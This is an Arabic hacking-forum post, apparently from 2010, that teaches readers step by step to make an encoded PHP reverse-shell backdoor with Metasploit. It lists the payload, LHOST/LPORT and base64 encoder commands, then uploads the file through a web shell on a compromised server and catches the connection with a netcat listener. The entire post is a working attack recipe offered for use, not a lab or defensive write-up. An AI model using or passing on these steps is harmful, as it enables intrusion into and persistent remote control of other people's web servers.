تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم وبمناسبة خروج الأخ الحبيب ASDELY-ScOrPiOn من الأسر بفضل الله ، يطيب لي أن أطرح لكم موضوع مميز وحصري عن طريقة عمل باك دور بالميتاسبلويت والإتصال به من خلال أداة النت كات .... نقوم بفتح أداة Metasploit Console وبعد أن تفتح نقوم بتنفيذ عدة أوامر لتكوين الباك الدور .... الأمر رقم ( 1 ) لتحديد البايلود الذي سيستخدم لصناعة ملف الباك دور . كود: use payload/php/reverse_php الأمر رقم ( 2 ) لتحديد الأي بي الخاص بنا لإستقبال الإتصال العكسي . كود: set LHOST your ip الأمر رقم ( 3 ) لتحديد بورت أو منفذ الخاص لإستقبال الإتصال العكسي . كود: set LPORT 2121 الأمر رقم ( 4 ) لتحديد نوع التشفير الذي سيستخدم لتشفير الباك دور . كود: set encoder php/base64 بعد ذلك تبقى أمامنا خطوتين الخطوة الأولى تنفيذ أمر صناعة البايلود المشفر من خلال كتابة الأمر التالي : .. كود: generate -t raw سينتج عن الأمر السابق تكون أكواد مشفرة كما توضح الصورة التالية نقوم بتحديد الكود وفقا لما هو موضح في الصورة تماما بعد ذلك نقوم بفتح المفكرة notebad ونقوم بوضع كود لغة php بداية ونهاية الصفحة كما توضح الصورة التالية ، وفي المنطقة التي بين الكودين والمحددة بالرقم ( 2 ) نقوم بلصق الكود المشفر الذي نسخناه من أداة الميتا سابقاً .. بعد ذلك نقوم بحفظ الملف بامتداد php كما توضح الصورة التالية تمهيدا لرفعه على الشيل .. بعد ذلك نقوم برفع ملف الباك دور إلى الشيل كما توضح الصورة التالية بعد رفع الملف على الشيل نقوم بتشغيل أداة netcat وتنفيذ أمر التنصت للبورت 2121 من خلال الأمر التالي : كود: nc -lvp 2121 الأن نقوم بتشغيل ملف الباك دور في الشيل من خلال استدعائة من المتصفح كما توضح الصورة التالية : بعد تشغيل الباك دور نتوجه لأداة الــ netcat وتوضح الصور التالية نجاح عملية الإتصال العكسي وتم تأكيد ذلك من خلال أمر الإستعراض وكانت النتائج ممتازة بفضل الله ويظهر لنا من خلال الإستعراض وجود ملف الباك دور نسأل الله أن نكون قد وفقنا بتوضيح الموضوع بصورة مبسطة ومفهومة للجميع ونأسف على أي تقصير ( جميع الحقوق محفوظة لمنتديات جيوش الهكرز ) ودمتم سالمين
use payload/php/reverse_php
set LHOST your ip
set LPORT 2121
set encoder php/base64
generate -t raw
nc -lvp 2121
التعديل الأخير تم بواسطة ASDELY-ScOrPiOn ; 05-13-2010 الساعة 03:10 PM
I love Yemen
قوانين المنتدى